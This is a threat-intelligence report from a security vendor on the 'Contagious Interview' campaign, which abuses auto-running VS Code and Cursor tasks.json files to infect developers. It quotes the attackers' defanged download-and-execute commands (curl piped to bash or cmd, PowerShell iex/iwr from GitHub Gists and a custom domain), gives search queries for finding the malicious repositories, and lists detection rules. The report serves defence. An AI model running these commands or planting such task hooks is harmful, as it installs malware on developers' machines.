Contagious Interview: VS Code & Cursor Infection Chains (Pt 1) | Abstract
Contagious Interview: Evolution of VS Code and Cursor Tasks Infection Chains - Part 1
Written by:
Abstract Security Threat Research Organization (ASTRO)
Published on:
Feb 25, 2026
Summary
Abstract customers already have visibility into the behaviors described in this report.
The ASTRO team has been actively tracking Contagious Interview techniques that abuse task auto-execution in integrated development environments (IDEs) such as Microsoft Visual Studio Code (VSCode) and Cursor to deliver malware. Since our last report on the tasks infection vector, we have observed a number of new payload stagers using short URLs, GitHub Gists, Google Drive, and some interesting custom domains. We have also seen a resurgence of previously reported infection chains and tooling now combined with the IDE tasks vector.
Findings
New Payload Stagers
In the last report, we noted heavy use of Vercel URLs for payload staging referenced directly in tasks.json files along with a handful of custom domains. While stagers hosted on Vercel continue to be prevalent (though many have been taken down), we have observed an increase in alternative staging servers used in the tasks commands and in later stages of the infection chains.
This GitHub Code search query returns a variety of new stagers while filtering out Vercel URLs that would make up the majority of results:
path:tasks.json runOn folderOpen (curl OR wget OR iwr) (cmd OR "| sh" OR \"bash\" OR \"powershell\" OR iex) NOT vercel
GitHub Gists
Recently, repos with tasks.json files were created with the same pattern of curl or other downloaders fetching scripts piped directly to shell, but in these cases the scripts were hosted in GitHub Gists. This query returns 2 repos with this pattern, each targeting both VS Code and Cursor users:
path:tasks.json runOn folderOpen "gist.githubusercontent"
Here is a sample command run from bash -c in Wisepanda-bot-main/.cursor/tasks.json:
curl -sL https://gist[.]githubusercontent[.]com/cuda-toolkit/0959deda4982736d1c1647cff354c665/raw/metal_pytorch_sim_v2.3.0.sh | bash
These files also have a variation for Windows using PowerShell instead of piping to cmd as previously seen, like so:
iex(iwr 'https://gist[.]githubusercontent[.]com/cuda-toolkit/936835c7a98d3b223970a5d2ed63fc97/raw/cuda_toolkit_sim_v12.4.ps1' -UseBasicParsing)
The gist user cuda-toolkit and script file names like cuda_toolkit_sim_v12.4.ps1 and metal_pytorch_sim_v2.3.0.sh are an attempt to masquerade as NVIDIA software, a tactic that Contagious Interview actors are known to use. This may be a recurring theme due to the intended campaign targets, typically software developers in DeFi and other cryptocurrency-related industries that are more likely to use high-performance GPUs.
(Speculative) A Copycat Actor?
This section has been adjusted to clarify that the following finding, while sharing techniques and patterns with previously documented Contagious Interview infection chains, may be a copycat or test by an unrelated actor and therefore is not confirmed to be part of the same campaign. This is largely due to the discovery that the chain results in Akira Stealer, a malware family not known to be used by Contagious Interview actors.
Possibly Unrelated Chain Shares Similar Techniques
In analyzing suspicious tasks.json files across GitHub, we encountered a tasks file in the repo adadsws/shannon, which is a malicious fork of the Keygraph Shannon AI penetration testing framework.
The tasks file executes the following command targeting Windows only:
curl https://nomgwenya[.]co[.]za/js/settings?win=32 | cmd
Detection Opportunities
VS Code/Cursor child process activity. Monitor for IDEs spawning shell processes running curl, wget, PowerShell download commands, or similar utilities (optionally including piped execution) shortly after process start.
GitHub Gist URLs in IDE task files. Monitor for gist.githubusercontent.com URLs in .vscode/tasks.json or .cursor/tasks.json files, particularly combined with curl, wget, iwr, or piped execution.
URL shorteners in IDE task files. Flag tasks.json files containing shortened URLs from services like short[.]gy. Shorteners obscure the destination and have no legitimate use in IDE task configurations.
PowerShell suspicious arguments in IDE task files. Tasks.json commands invoking PowerShell with -ExecutionPolicy Bypass combined with -WindowStyle Hidden and iex/iwr.
Google Drive downloads from non-browser processes. Alert on drive.google.com or drive.usercontent.google.com requests initiated by non-browser processes like node or npm. Google Drive URLs in the format https://drive[.]usercontent[.]google[.]com/download?id=${fileId}&export=download&confirm=t are particularly suspicious as they indicate attempts to bypass virus scan warning pages.
Conclusion
Contagious Interview actors continue to evolve their infrastructure and techniques. The shift toward GitHub Gists, URL shorteners, and Google Drive for payload staging suggests the actors are actively adapting to community reporting and platform takedowns.